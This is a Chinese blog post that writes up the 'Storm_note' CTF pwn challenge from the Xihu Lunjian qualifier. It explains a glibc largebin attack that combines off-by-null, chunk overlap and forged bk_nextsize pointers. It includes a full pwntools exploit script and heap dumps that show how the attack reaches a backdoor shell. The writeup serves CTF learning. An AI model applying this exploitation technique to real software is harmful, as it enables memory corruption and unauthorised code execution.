西湖论剑 预选赛 pwn3 看 Largebin

最新推荐文章于 2024-04-22 14:30:24 发布
最新推荐文章于 2024-04-22 14:30:24 发布
阅读量266 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/96726298
版权

参考链接

https://xz.aliyun.com/t/4791#toc-13

不得不说 这个博客写的很详细了。。。

建议去看 上面的链接  上面的链接写的 很详细 

这个题 让我认识到了 Large bin  这个玩意真的很,,,,难

感觉比上面那两个难很多

一般来说 题目很少涉及 Large bin    涉及的题目一般都会禁止 fastbin

  if ( !mallopt(1, 0) )
    exit(-1);

这两行就是禁止了  fastbin  然后  mmap 下面这里是 读取随机数

这个程序有个后门

让我们输入的字符 等于 那个随机数才行    想绕过也很简单 直接把随机数改成我们想要的就行  然后程序还有一个off by null

 然后看一下这个题目的保护

保护全开 QAQ 这里最让人头疼的应该就是PIE了,

这里 用到的做法就是堆块重叠 

先看一下  Large bin  的结构比正常的多了两个指针

  struct malloc_chunk* fd_nextsize; 
  struct malloc_chunk* bk_nextsize;

并且这两个指针 只有 不同 大小的 largebin 的第一个 才会有 指向那个不同的largebin   如果相同的话 会指向自己

然后我们这里直接粘贴 网上流传的 exp吧

根据这个exp 来讲,,

from pwn import *
p = process('./Storm_note')

def add(size):
  p.recvuntil('Choice')
  p.sendline('1')
  p.recvuntil('?')
  p.sendline(str(size))

def edit(idx,mes):
  p.recvuntil('Choice')
  p.sendline('2')
  p.recvuntil('?')
  p.sendline(str(idx))
  p.recvuntil('Content')
  p.send(mes)

def dele(idx):
  p.recvuntil('Choice')
  p.sendline('3')
  p.recvuntil('?')
  p.sendline(str(idx))


add(0x18)
add(0x508)
add(0x18)

add(0x18)
add(0x508)
add(0x18)
add(0x18)

edit(1,'a'*0x4f0+p64(0x500))
edit(4,'a'*0x4f0+p64(0x500))


dele(1)
edit(0,'a'*0x18)

add(0x18)
add(0x4d8)

dele(1)
dele(2)


add(0x30)
edit(7,'ffff')
add(0x4e0)

dele(4)
edit(3,'a'*0x18)
add(0x18)
add(0x4d8)
dele(4)
dele(5)
add(0x40)
edit(8,'ffff')


dele(2)
add(0x4e8)      # put chunk5 to largebin
dele(2)


content_addr = 0xabcd0100
fake_chunk = content_addr - 0x20

payload = p64(0)*2 + p64(0) + p64(0x4f1) # size
payload += p64(0) + p64(fake_chunk)      # bk
edit(7,payload)


payload2 = p64(0)*4 + p64(0) + p64(0x4e1) #size
payload2 += p64(0) + p64(fake_chunk+8)   
payload2 += p64(0) + p64(fake_chunk-0x18-5)

edit(8,payload2)

add(0x40)

payload = p64(0) * 2+p64(0) * 6
edit(2,payload)

p.sendlineafter('Choice: ','666')

p.send(p64(0)*6)

p.interactive()

这里 堆块分了 三块

add(0x18)
add(0x508)
add(0x18)

add(0x18)
add(0x508)
add(0x18)


add(0x18)

 

第一个  和第二个都是为了  操作 让堆块溢出的

第三个是为了 防止 于top 进行合并

然后伪造一下  下个chunk的 prev_size 然后我们继续看一下

edit(1,'a'*0x4f0+p64(0x500))

edit(4,'a'*0x4f0+p64(0x500))

继续往下看

利用 off by null  来修改 511 为500

dele(1)
edit(0,'a'*0x18)

 这里的上面和下面的做法一模一样

然后继续

add(0x18)
add(0x4d8)

因为没有了  fastbin  所以直接 在 unsorted bin 找 合适的堆块

这里的两个堆块刚好把我们释放的堆块填满然后我们看一下堆内情况

这里可以看出两点  第一就是free掉后的  chunk1  然后上面我们发现 我们伪造的

  prev_size = 0,
  size = 1,

已经成功   。。 但是 note 里面记录的却是 还是原来的    prev_size=500  size=20  (注意 此时不是21)

add(0x18)
add(0x4d8)

的时候 就已经把size =0x21 改成了 size=20(这里有点疑惑 不知道为啥 估计是因为)并且把 伪造的size 改成了1

这里最后一位的1 就是 size的 PREV_INUSE 就是0 代表了 前一块是 free 状态的    加上 prev_size =510  所以正好可以 引发 unlink 然后导致  我们申请的第七个堆块  进行了覆盖 我们就可以通过 第七个堆块操控里面的值了

要说的一点就是  伪造第一个和第二个还是有区别的

dele(4)
edit(3,'a'*0x18)        
add(0x18)
add(0x4d8)
dele(4)
dele(5)
add(0x40)                 

第一个是  add(0x30)  add(0x4e0)

add(0x30) 的 size 为 0x30 的原因是只需要控制 chunk7 的 fd 和 bk 指针即可

add(0x40)的原因

  • 前一个 largebin 只需要伪造 bk 指针,而后一个需要伪造 bk_nextsize,所以比前一个块大 0x10
  • 为了让 largebin 的 bk_nextsize 有效,前后两个的 largebin 的 size 不能相同

然后进行下一步

(下面的一段话 借鉴于 上面的链接)

dele(2)
add(0x4e8)   
dele(2)

 这里是为了循环 unsorted bin  让chunk4  进入 Large bin 里面

因为 largebin 中此时就只有一个 chunk5 ,所以这时的 fd_nextsize 和 bk_nextsize 会暂时指向自己。

这里和unsorted bin  的 bk  fd 都指向自己差不多

 

再次 free 掉 chunk2。这次就又将 chunk2 放回 unsorted bin 中。

然后接下来就是伪造指针

content_addr = 0xabcd0100
fake_chunk = content_addr - 0x20

payload = p64(0)*2 + p64(0) + p64(0x4f1)    # size
payload += p64(0) + p64(fake_chunk)         # bk
edit(7,payload)
payload2 = p64(0)*4 + p64(0) + p64(0x4e1)    # size
payload2 += p64(0) + p64(fake_chunk+8)       
payload2 += p64(0) + p64(fake_chunk-0x18-5)

edit(8,payload2)

接下来需要 alloc 一个 0x40 的 chunk,当 malloc 这个 chunk 时,首先会遍历 unsorted bin,从第一个 unsorted bin 的 bk 指针开始遍历(chunk2 的 bk 指针)

在 chunk2 中,这里我们伪造的是 bk=0xabcd0100-0x20=0xabcd00e0,发现 bk 指向的 chunk 的 size 为 0 不合适,这时和前面的步骤一样,将 chunk2 从 unsorted bin 中脱链放进 largebin 中

这个过程会完成:

fwd->bk_nextsize->fd_nextsize=victim
fwd->bk=victim

在这里等价于:
chunk5->bk_nextsize->fd_nextsize = chunk2
chunk5->bk = chunk2

堆排布如下

chunk2:
0x55e2396f2060: 0x0000000000000000  0x00000000000004f1
0x55e2396f2070: 0x0000000000000000  0x00000000abcd00e0  <-bk
0x55e2396f2080: 0x0000000000000000  0x0000000000000000
0x55e2396f2090: 0x0000000000000000  0x0000000000000000

chunk5:
0x55e2396f25c0: 0x0000000000000000  0x00000000000004e1
0x55e2396f25d0: 0x0000000000000000  0x00000000abcd00e8  <-bk
0x55e2396f25e0: 0x0000000000000000  0x00000000abcd00c3
0x55e2396f25f0: 0x0000000000000000  0x0000000000000000

在 add(0x40) 之后,情况应该是:

1. 0xabcd00c3->fd_nextsize = 0x55e2396f2060 即 
*0xabcd00e3 = 0x55e2396f2060 

2. 0x55e2396f25c0->fd = 0x55e2396f2060 即 
*0x55e2396f25d8 = 0x55e2396f2060

 

所以这里在完成 unlink 操作后,这个 chunk 最后我们会分配到 0xabcd00f0 地址。

  • largebin 中的 bk_nextsize 需要伪造成 p64(fake_chunk-0x18-5) 的原因类似于 fastbin 的检查机制。alloc 时的堆块会检查这个位置的 size 字段是否和当前的 malloc 的 size 满足对齐规则。这里伪造的 size 为 0x56,因为受到 PIE 的影响这个值会有偏差,所以这里 alloc 失败的话可以多试几次。

 

此时的 chunk2 从 0xabcd00f0 开始填充,后面的 0x40 的大小区域都可控,所以这里只需要预先填入准备好的值,后面输入 666 就可以进入到后门函数,再次填入这个值即可通过判断,进而 getshell。

payload = p64(0) * 2+p64(0) * 6
edit(2,payload)

p.sendlineafter('Choice: ','666')

p.send(p64(0)*6)

总结

以前没有接触过这类的题型 这次根据详细的例题解题方法  认识到了   Largebin

 

pipixia233333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
large bin 】源码解析
huzai9527的博客
11-09 584
large bin attack large bin的结构 网找了好久,没有一个形象的理解确实读源码不方便,找了好久,mkx7师傅的这篇文章总结的及其好! largebinbin操作 当确定victim的大小在largebin范围后,如何将victim插入larbin的过程如下 首先判断largebin 是否为空 如果空的直接设置victim为victim size大小的chunk 头节点,并将fd_nextsize和bk_nextsize设置为victm 如果largebin
CTF pwn题堆入门 -- Large bin
lifanxin的博客
04-07 1791
Large bin概述攻击方式分配堆到目的地址house of force总结 概述   large bin采用双链表结构,libc-2.23版本下64位机器上,最小为0x400(1024字节),里面的chunk从头结点的fd指针开始,按大小顺序排列。不同于fast bin, small bin, unsorted bin的结构,当属于large bin的chunk被释放时,chunk中还会有fd_nextsize和bk_nextsize指针,分别指向前后第一个与本身chunk大小不同的chunk。当然也就
largebin结构探究&&堆分配机制
最新发布
A13837377363的博客
04-22 465
在许多文章上看到若在fastbin和smallbin中找不到相应大小的堆块,会将fastbin进行合并。但经过我的测试,fastbin貌似并不会合并,根据做题经验fastbin也不会合并,不然这么uaf。所以我认为堆的分配顺序应该是:1.在fastbin和smallbin中寻找有没有大小正好的,若有则直接分配,若没有,进入2.2.在unsortedbin中寻找,从尾部开始,遍历过的堆块放入smallbinlargebin中,0x400为分界,直到找到大小正好的,分配,若没找到,进入3.
CTF_论剑场 pwn3
W3rsn
04-16 298
先把附件下载下来,然后checksec checksec pwn3 然后IDA64打开 read函数存在栈溢出,然后重新里还有一个getshell函数。所以控制程序运行流程使它跳转到getshell函数就可以得到flag from pwn import * context(arch="amd64", os="linux") p = remote("114.116.54.89",...
2019 安恒周周练西湖论剑特别版 pwn 题目wp
abc380620175的博客
03-28 552
pwn1 考点:构造 shellcode,patch 汇编指令 IDA 查看反汇编,程序的逻辑很简单如,如果 直接 f5 的话 IDA 可能识别不出来函数,问题出在 0x080484CF 这个地方,call eax 指令识别不出来,所以这里可以先 patch 成 nop,之后 f5 就正常了。 程序把输入当成 shellcode 直接来执行,很显然是直接往栈上写 shellcode ...
CTF-PWN-level3(Jarvis OJ)
SuperGate的博客
02-15 456
发现这个系列的题构造都差不多……不过不同的是这道题中没有给出system的地址。 checksec一下发现cannary没开,于是分析read函数,发现可以栈溢出。 基本思路就是先利用第二个write函数打印出write函数的got表地址。然后再在给出的libc库中找到write函数的地址,计算偏移值offset。再从libc库中找到system,/bin/sh的地址,通过offset和栈溢出...
好好说话之Large Bin Attack
hollk’s blog
01-20 4415
large bin attack这种方法本质上并不难,只是有点绕而已。他和上一篇unsorted bin attack有点类似,都是chunk挂进bin链表的时候通过完成链表结构连接时发生的问题,只不过large chunk还需要考虑fd_nextsize和bk_nextsize这两个结构。接下来就剩Tcache attack和House系列啦!终于要熬出头了???? 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
西湖论剑WriteUp By Nu1L.pdf
11-26
"西湖论剑WriteUp By Nu1L" 本文档涵盖了多个IT领域的知识点,涵盖了信息安全、密码学、编程语言和算法等领域。下面将逐一介绍这些知识点。 1. Reverse ROR(Reverse Rotate Right):从代码中可以看到,作者使用...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
TIM3_PWN呼吸灯.zip
10-12
本项目“TIM3_PWN呼吸灯.zip”聚焦于使用STM32的通用定时器TIM3来实现一个常见的LED呼吸灯效果,该效果通过PWM(脉宽调制)技术来实现。PWM是一种在数字系统中模拟模拟信号的技术,它通过改变信号的占空比(高电平...
large bin attack & house of strom
seaaseesa的博客
06-12 1114
large bin attack & house of strom large bin attack是一种堆利用手法,而house of strom则是在large bin attack的基础上借用unsorted bin来达到任意地址分配,首先我们从源码入手来分析large bin attack原理,然后再讲讲house of strom的原理,接着再看几个题目。 为例方便分析,以2.23为例,新版本有tcache的情况类似,只需填满tcache bin绕过tcache即可。 在free的时
ptmalloc代码浅析2(small bin/large bin结构图)
zeroom的技术专栏
08-14 4878
ptmalloc中的small binlarge bin维护着不同结构的chunk链表: 1. 每个small bin维护着一个双向循环链表,而且chunk size都相同。当allocate memory时,总是从链表尾端unlink一个chunk,deallocate memory时,将那个chunk link到链表头。属于FILO规则,每个chunk都有机会被分配到app。
PRO(2.31largebin attack)
qq_33590156的博客
12-04 2859
关于largebin pro版本给了修复chunk flag的函数,而且show和edit都只看flag,free还没清指针,可以各种UAF。 但是,add中只能申请large chunk,这导致UAF不能进行任意地址申请,而且版本是libc2.31。 所以我们能用的就只能是largebin attack了,首先利用原理是,在largebin的管理中,采用先进先出的原则(插队头,取队尾),而且会排序,队头大,到队尾依次变小, 四个指针: fd是从队头一直指向队尾,队尾的fd指向main_arena; bk则
西湖论剑——pwn
weixin_44319142的博客
04-07 537
pwn 这道题目开了canary,和之前的套路相似,就是要泄露canary,利用栈溢出找到system和/bin/sh,拿到访问权限 看一下函数 printf存在格式化字符串漏洞可以用于泄漏canary p.sendlineafter("ID:","%15$p") #不解释了这个要打印的是第十五个参数,也就是canary的值 p.recvuntil("Hello ")#输出hello之后...
CTF_论剑场 Web WriteUp(持续更新)
qq_41995976的博客
05-19 6316
文章目录web1web9流量分析web2web5web6web11web13日志审计web20 web1 利用的是变量覆盖漏洞 http://www.mamicode.com/info-detail-2314166.html payload:http://123.206.31.85:10001/?a=&c=aaaaa web9 题干: 要求你PUT一串信息"bugku" 才能获得flag...
2019西湖论剑Storm_note
热门推荐
钞sir的博客
04-13 1万+
分析 这道题的漏洞不多,在edit note的时候有一个off_by_null漏洞: 然后还有一个后门: 没有show功能,想要泄露地址有难度;而且程序禁用了fastbin的申请: ssize_t init_proc() { ssize_t result; // rax int fd; // [rsp+Ch] [rbp-4h] setbuf(stdin, 0LL); setb...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值